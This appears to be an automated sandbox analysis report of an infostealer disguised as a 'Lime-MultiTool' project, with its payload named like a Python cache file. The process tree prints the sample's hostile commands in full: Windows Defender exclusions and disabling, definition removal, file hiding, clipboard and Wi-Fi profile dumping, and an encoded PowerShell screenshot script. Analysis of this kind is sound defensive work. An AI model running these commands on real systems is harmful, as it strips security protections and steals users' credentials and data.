Overview
overview
10Static
static
10Lime-Multi...in.zip
windows10-2004-x64
10Lime-Multi...DME.md
windows10-2004-x64
3Lime-Multi...ts.txt
windows10-2004-x64
1Lime-Multi...ain.py
windows10-2004-x64
3Lime-Multi...11.exe
windows10-2004-x64
8�4o.��_.pyc
windows10-2004-x64
Lime-Multi...rt.bat
windows10-2004-x64
10Analysis
-
max time kernel
434s -
max time network
436s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
14-11-2024 16:59
Behavioral task
behavioral1
Sample
Lime-MultiTool-main.zip
Resource
win10v2004-20241007-en
Behavioral task
behavioral2
Sample
Lime-MultiTool-main/README.md
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Lime-MultiTool-main/requirements.txt
Resource
win10v2004-20241007-en
Behavioral task
behavioral4
Sample
Lime-MultiTool-main/src/main.py
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
Lime-MultiTool-main/src/utils/__pycache__/cpython-311.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral6
Sample
�4o.��_.pyc
Resource
win10v2004-20241007-en
Behavioral task
behavioral7
Sample
Lime-MultiTool-main/start.bat
Resource
win10v2004-20241007-en
General
-
Target
Lime-MultiTool-main/src/utils/__pycache__/cpython-311.exe
-
Size
7.4MB
-
MD5
1a2ff293768d10b8c99d3cd2950164b9
-
SHA1
e9123a3d2a53b5f8d008db9608037dd0571f3cae
-
SHA256
3c09a37412bf3981e5d678b6598c2cdad32fcd6761fc649a50693ba45746e242
-
SHA512
ff8a853675431bc36d88288546d7f467f239ae2e4e7ef019476ac4ca06f715e88f201753d7201dbfacb3b6dca51be764036372de8a8c0def29e00ae5e9469941
-
SSDEEP
98304:FWeYgI6OshoKyDvuIYc5AhV+gEc4kZvRLoI0EJfNA3z5UTfHfyk6LK4dSI23o7yc:FPYmOshoKMuIkhVastRL5Di3tO/ys42O
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid Process 3628 powershell.exe 364 powershell.exe 4064 powershell.exe 3180 powershell.exe 3516 powershell.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
-
Executes dropped EXE 1 IoCs
Processes:
rar.exepid Process 2160 rar.exe -
Loads dropped DLL 17 IoCs
Processes:
cpython-311.exepid Process 1940 cpython-311.exe 1940 cpython-311.exe 1940 cpython-311.exe 1940 cpython-311.exe 1940 cpython-311.exe 1940 cpython-311.exe 1940 cpython-311.exe 1940 cpython-311.exe 1940 cpython-311.exe 1940 cpython-311.exe 1940 cpython-311.exe 1940 cpython-311.exe 1940 cpython-311.exe 1940 cpython-311.exe 1940 cpython-311.exe 1940 cpython-311.exe 1940 cpython-311.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 19 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 3 IoCs
Processes:
tasklist.exetasklist.exetasklist.exepid Process 2872 tasklist.exe 4548 tasklist.exe 1000 tasklist.exe -
Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
-
Processes:
resource yara_rule behavioral5/files/0x000a000000023ba5-21.dat upx behavioral5/memory/1940-25-0x00007FFA743E0000-0x00007FFA749C9000-memory.dmp upx behavioral5/files/0x000a000000023b9a-27.dat upx behavioral5/memory/1940-30-0x00007FFA83300000-0x00007FFA83323000-memory.dmp upx behavioral5/files/0x000a000000023ba3-31.dat upx behavioral5/memory/1940-32-0x00007FFA875F0000-0x00007FFA875FF000-memory.dmp upx behavioral5/files/0x000a000000023b9d-39.dat upx behavioral5/memory/1940-40-0x00007FFA832D0000-0x00007FFA832FD000-memory.dmp upx behavioral5/files/0x000a000000023b99-41.dat upx behavioral5/memory/1940-43-0x00007FFA86E80000-0x00007FFA86E99000-memory.dmp upx behavioral5/files/0x000a000000023ba0-44.dat upx behavioral5/memory/1940-47-0x00007FFA82BA0000-0x00007FFA82BC3000-memory.dmp upx behavioral5/files/0x000a000000023ba8-46.dat upx behavioral5/memory/1940-49-0x00007FFA82A00000-0x00007FFA82B77000-memory.dmp upx behavioral5/files/0x000a000000023b9f-50.dat upx behavioral5/memory/1940-52-0x00007FFA83A50000-0x00007FFA83A69000-memory.dmp upx behavioral5/files/0x000a000000023ba7-53.dat upx behavioral5/memory/1940-55-0x00007FFA875E0000-0x00007FFA875ED000-memory.dmp upx behavioral5/files/0x000a000000023ba1-56.dat upx behavioral5/memory/1940-59-0x00007FFA7FDE0000-0x00007FFA7FE13000-memory.dmp upx behavioral5/files/0x000a000000023ba2-58.dat upx behavioral5/files/0x000a000000023ba4-60.dat upx behavioral5/memory/1940-65-0x00007FFA73E20000-0x00007FFA73EED000-memory.dmp upx behavioral5/memory/1940-67-0x00007FFA73900000-0x00007FFA73E20000-memory.dmp upx behavioral5/memory/1940-68-0x00007FFA83300000-0x00007FFA83323000-memory.dmp upx behavioral5/memory/1940-63-0x00007FFA743E0000-0x00007FFA749C9000-memory.dmp upx behavioral5/files/0x000a000000023b9c-69.dat upx behavioral5/files/0x000b000000023ba9-78.dat upx behavioral5/memory/1940-79-0x00007FFA735F0000-0x00007FFA7370C000-memory.dmp upx behavioral5/memory/1940-74-0x00007FFA82200000-0x00007FFA8220D000-memory.dmp upx behavioral5/memory/1940-73-0x00007FFA7A760000-0x00007FFA7A774000-memory.dmp upx behavioral5/files/0x000a000000023b9e-72.dat upx behavioral5/memory/1940-147-0x00007FFA82BA0000-0x00007FFA82BC3000-memory.dmp upx behavioral5/memory/1940-184-0x00007FFA82A00000-0x00007FFA82B77000-memory.dmp upx behavioral5/memory/1940-261-0x00007FFA83A50000-0x00007FFA83A69000-memory.dmp upx behavioral5/memory/1940-278-0x00007FFA875E0000-0x00007FFA875ED000-memory.dmp upx behavioral5/memory/1940-290-0x00007FFA7FDE0000-0x00007FFA7FE13000-memory.dmp upx behavioral5/memory/1940-300-0x00007FFA73E20000-0x00007FFA73EED000-memory.dmp upx behavioral5/memory/1940-312-0x00007FFA73900000-0x00007FFA73E20000-memory.dmp upx behavioral5/memory/1940-329-0x00007FFA82A00000-0x00007FFA82B77000-memory.dmp upx behavioral5/memory/1940-323-0x00007FFA743E0000-0x00007FFA749C9000-memory.dmp upx behavioral5/memory/1940-324-0x00007FFA83300000-0x00007FFA83323000-memory.dmp upx behavioral5/memory/1940-358-0x00007FFA82BA0000-0x00007FFA82BC3000-memory.dmp upx behavioral5/memory/1940-362-0x00007FFA7FDE0000-0x00007FFA7FE13000-memory.dmp upx behavioral5/memory/1940-361-0x00007FFA875E0000-0x00007FFA875ED000-memory.dmp upx behavioral5/memory/1940-360-0x00007FFA83A50000-0x00007FFA83A69000-memory.dmp upx behavioral5/memory/1940-359-0x00007FFA82A00000-0x00007FFA82B77000-memory.dmp upx behavioral5/memory/1940-357-0x00007FFA86E80000-0x00007FFA86E99000-memory.dmp upx behavioral5/memory/1940-356-0x00007FFA832D0000-0x00007FFA832FD000-memory.dmp upx behavioral5/memory/1940-355-0x00007FFA875F0000-0x00007FFA875FF000-memory.dmp upx behavioral5/memory/1940-354-0x00007FFA83300000-0x00007FFA83323000-memory.dmp upx behavioral5/memory/1940-353-0x00007FFA73900000-0x00007FFA73E20000-memory.dmp upx behavioral5/memory/1940-352-0x00007FFA735F0000-0x00007FFA7370C000-memory.dmp upx behavioral5/memory/1940-351-0x00007FFA82200000-0x00007FFA8220D000-memory.dmp upx behavioral5/memory/1940-350-0x00007FFA7A760000-0x00007FFA7A774000-memory.dmp upx behavioral5/memory/1940-348-0x00007FFA73E20000-0x00007FFA73EED000-memory.dmp upx behavioral5/memory/1940-338-0x00007FFA743E0000-0x00007FFA749C9000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exedescription ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
cmd.exePING.EXEpid Process 2368 cmd.exe 1720 PING.EXE -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
-
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 24 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid Process 3628 powershell.exe 4064 powershell.exe 4064 powershell.exe 364 powershell.exe 364 powershell.exe 4012 powershell.exe 4012 powershell.exe 3628 powershell.exe 3628 powershell.exe 4064 powershell.exe 4064 powershell.exe 4772 powershell.exe 4772 powershell.exe 364 powershell.exe 4012 powershell.exe 4772 powershell.exe 3180 powershell.exe 3180 powershell.exe 5092 powershell.exe 5092 powershell.exe 3516 powershell.exe 3516 powershell.exe 4416 powershell.exe 4416 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exetasklist.exetasklist.exeWMIC.exetasklist.exepowershell.exepowershell.exepowershell.exepowershell.exeWMIC.exedescription pid Process Token: SeDebugPrivilege 3628 powershell.exe Token: SeDebugPrivilege 4064 powershell.exe Token: SeDebugPrivilege 364 powershell.exe Token: SeDebugPrivilege 4548 tasklist.exe Token: SeDebugPrivilege 2872 tasklist.exe Token: SeIncreaseQuotaPrivilege 3528 WMIC.exe Token: SeSecurityPrivilege 3528 WMIC.exe Token: SeTakeOwnershipPrivilege 3528 WMIC.exe Token: SeLoadDriverPrivilege 3528 WMIC.exe Token: SeSystemProfilePrivilege 3528 WMIC.exe Token: SeSystemtimePrivilege 3528 WMIC.exe Token: SeProfSingleProcessPrivilege 3528 WMIC.exe Token: SeIncBasePriorityPrivilege 3528 WMIC.exe Token: SeCreatePagefilePrivilege 3528 WMIC.exe Token: SeBackupPrivilege 3528 WMIC.exe Token: SeRestorePrivilege 3528 WMIC.exe Token: SeShutdownPrivilege 3528 WMIC.exe Token: SeDebugPrivilege 3528 WMIC.exe Token: SeSystemEnvironmentPrivilege 3528 WMIC.exe Token: SeRemoteShutdownPrivilege 3528 WMIC.exe Token: SeUndockPrivilege 3528 WMIC.exe Token: SeManageVolumePrivilege 3528 WMIC.exe Token: 33 3528 WMIC.exe Token: 34 3528 WMIC.exe Token: 35 3528 WMIC.exe Token: 36 3528 WMIC.exe Token: SeDebugPrivilege 1000 tasklist.exe Token: SeDebugPrivilege 4012 powershell.exe Token: SeIncreaseQuotaPrivilege 3528 WMIC.exe Token: SeSecurityPrivilege 3528 WMIC.exe Token: SeTakeOwnershipPrivilege 3528 WMIC.exe Token: SeLoadDriverPrivilege 3528 WMIC.exe Token: SeSystemProfilePrivilege 3528 WMIC.exe Token: SeSystemtimePrivilege 3528 WMIC.exe Token: SeProfSingleProcessPrivilege 3528 WMIC.exe Token: SeIncBasePriorityPrivilege 3528 WMIC.exe Token: SeCreatePagefilePrivilege 3528 WMIC.exe Token: SeBackupPrivilege 3528 WMIC.exe Token: SeRestorePrivilege 3528 WMIC.exe Token: SeShutdownPrivilege 3528 WMIC.exe Token: SeDebugPrivilege 3528 WMIC.exe Token: SeSystemEnvironmentPrivilege 3528 WMIC.exe Token: SeRemoteShutdownPrivilege 3528 WMIC.exe Token: SeUndockPrivilege 3528 WMIC.exe Token: SeManageVolumePrivilege 3528 WMIC.exe Token: 33 3528 WMIC.exe Token: 34 3528 WMIC.exe Token: 35 3528 WMIC.exe Token: 36 3528 WMIC.exe Token: SeDebugPrivilege 4772 powershell.exe Token: SeDebugPrivilege 3180 powershell.exe Token: SeDebugPrivilege 5092 powershell.exe Token: SeIncreaseQuotaPrivilege 4208 WMIC.exe Token: SeSecurityPrivilege 4208 WMIC.exe Token: SeTakeOwnershipPrivilege 4208 WMIC.exe Token: SeLoadDriverPrivilege 4208 WMIC.exe Token: SeSystemProfilePrivilege 4208 WMIC.exe Token: SeSystemtimePrivilege 4208 WMIC.exe Token: SeProfSingleProcessPrivilege 4208 WMIC.exe Token: SeIncBasePriorityPrivilege 4208 WMIC.exe Token: SeCreatePagefilePrivilege 4208 WMIC.exe Token: SeBackupPrivilege 4208 WMIC.exe Token: SeRestorePrivilege 4208 WMIC.exe Token: SeShutdownPrivilege 4208 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cpython-311.execpython-311.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exepowershell.exedescription pid Process procid_target PID 4888 wrote to memory of 1940 4888 cpython-311.exe 83 PID 4888 wrote to memory of 1940 4888 cpython-311.exe 83 PID 1940 wrote to memory of 5064 1940 cpython-311.exe 87 PID 1940 wrote to memory of 5064 1940 cpython-311.exe 87 PID 1940 wrote to memory of 3996 1940 cpython-311.exe 88 PID 1940 wrote to memory of 3996 1940 cpython-311.exe 88 PID 1940 wrote to memory of 4904 1940 cpython-311.exe 89 PID 1940 wrote to memory of 4904 1940 cpython-311.exe 89 PID 1940 wrote to memory of 5068 1940 cpython-311.exe 93 PID 1940 wrote to memory of 5068 1940 cpython-311.exe 93 PID 3996 wrote to memory of 4064 3996 cmd.exe 95 PID 3996 wrote to memory of 4064 3996 cmd.exe 95 PID 4904 wrote to memory of 4776 4904 cmd.exe 96 PID 4904 wrote to memory of 4776 4904 cmd.exe 96 PID 5064 wrote to memory of 3628 5064 cmd.exe 97 PID 5064 wrote to memory of 3628 5064 cmd.exe 97 PID 1940 wrote to memory of 3984 1940 cpython-311.exe 98 PID 1940 wrote to memory of 3984 1940 cpython-311.exe 98 PID 1940 wrote to memory of 1428 1940 cpython-311.exe 99 PID 1940 wrote to memory of 1428 1940 cpython-311.exe 99 PID 1940 wrote to memory of 1524 1940 cpython-311.exe 137 PID 1940 wrote to memory of 1524 1940 cpython-311.exe 137 PID 1940 wrote to memory of 1040 1940 cpython-311.exe 104 PID 1940 wrote to memory of 1040 1940 cpython-311.exe 104 PID 5068 wrote to memory of 364 5068 cmd.exe 106 PID 5068 wrote to memory of 364 5068 cmd.exe 106 PID 1940 wrote to memory of 308 1940 cpython-311.exe 107 PID 1940 wrote to memory of 308 1940 cpython-311.exe 107 PID 1940 wrote to memory of 4280 1940 cpython-311.exe 108 PID 1940 wrote to memory of 4280 1940 cpython-311.exe 108 PID 1940 wrote to memory of 4696 1940 cpython-311.exe 110 PID 1940 wrote to memory of 4696 1940 cpython-311.exe 110 PID 3984 wrote to memory of 4548 3984 cmd.exe 112 PID 3984 wrote to memory of 4548 3984 cmd.exe 112 PID 1428 wrote to memory of 2872 1428 cmd.exe 113 PID 1428 wrote to memory of 2872 1428 cmd.exe 113 PID 1940 wrote to memory of 4172 1940 cpython-311.exe 114 PID 1940 wrote to memory of 4172 1940 cpython-311.exe 114 PID 1940 wrote to memory of 1768 1940 cpython-311.exe 116 PID 1940 wrote to memory of 1768 1940 cpython-311.exe 116 PID 1524 wrote to memory of 3528 1524 cmd.exe 119 PID 1524 wrote to memory of 3528 1524 cmd.exe 119 PID 1040 wrote to memory of 4012 1040 cmd.exe 120 PID 1040 wrote to memory of 4012 1040 cmd.exe 120 PID 308 wrote to memory of 1000 308 cmd.exe 121 PID 308 wrote to memory of 1000 308 cmd.exe 121 PID 4696 wrote to memory of 1432 4696 cmd.exe 123 PID 4696 wrote to memory of 1432 4696 cmd.exe 123 PID 1768 wrote to memory of 4772 1768 cmd.exe 124 PID 1768 wrote to memory of 4772 1768 cmd.exe 124 PID 4172 wrote to memory of 1112 4172 cmd.exe 125 PID 4172 wrote to memory of 1112 4172 cmd.exe 125 PID 4280 wrote to memory of 2896 4280 cmd.exe 126 PID 4280 wrote to memory of 2896 4280 cmd.exe 126 PID 1940 wrote to memory of 1092 1940 cpython-311.exe 127 PID 1940 wrote to memory of 1092 1940 cpython-311.exe 127 PID 1092 wrote to memory of 1420 1092 cmd.exe 140 PID 1092 wrote to memory of 1420 1092 cmd.exe 140 PID 1940 wrote to memory of 2972 1940 cpython-311.exe 130 PID 1940 wrote to memory of 2972 1940 cpython-311.exe 130 PID 2972 wrote to memory of 4600 2972 cmd.exe 132 PID 2972 wrote to memory of 4600 2972 cmd.exe 132 PID 4772 wrote to memory of 1984 4772 powershell.exe 133 PID 4772 wrote to memory of 1984 4772 powershell.exe 133 -
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\Lime-MultiTool-main\src\utils\__pycache__\cpython-311.exe"C:\Users\Admin\AppData\Local\Temp\Lime-MultiTool-main\src\utils\__pycache__\cpython-311.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4888 -
C:\Users\Admin\AppData\Local\Temp\Lime-MultiTool-main\src\utils\__pycache__\cpython-311.exe"C:\Users\Admin\AppData\Local\Temp\Lime-MultiTool-main\src\utils\__pycache__\cpython-311.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1940 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Lime-MultiTool-main\src\utils\__pycache__\cpython-311.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:5064 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Lime-MultiTool-main\src\utils\__pycache__\cpython-311.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3628
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:3996 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4064
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Lime-MultiTool-main\src\utils\__pycache__\cpython-311.exe""3⤵
- Hide Artifacts: Hidden Files and Directories
- Suspicious use of WriteProcessMemory
PID:4904 -
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Temp\Lime-MultiTool-main\src\utils\__pycache__\cpython-311.exe"4⤵
- Views/modifies file attributes
PID:4776
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"3⤵
- Suspicious use of WriteProcessMemory
PID:5068 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:364
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:3984 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4548
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:1428 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2872
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵
- Suspicious use of WriteProcessMemory
PID:1524 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3528
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
- Suspicious use of WriteProcessMemory
PID:1040 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4012
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:308 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1000
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
- Suspicious use of WriteProcessMemory
PID:4280 -
C:\Windows\system32\tree.comtree /A /F4⤵PID:2896
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵
- System Network Configuration Discovery: Wi-Fi Discovery
- Suspicious use of WriteProcessMemory
PID:4696 -
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:1432
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵
- Suspicious use of WriteProcessMemory
PID:4172 -
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:1112
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcw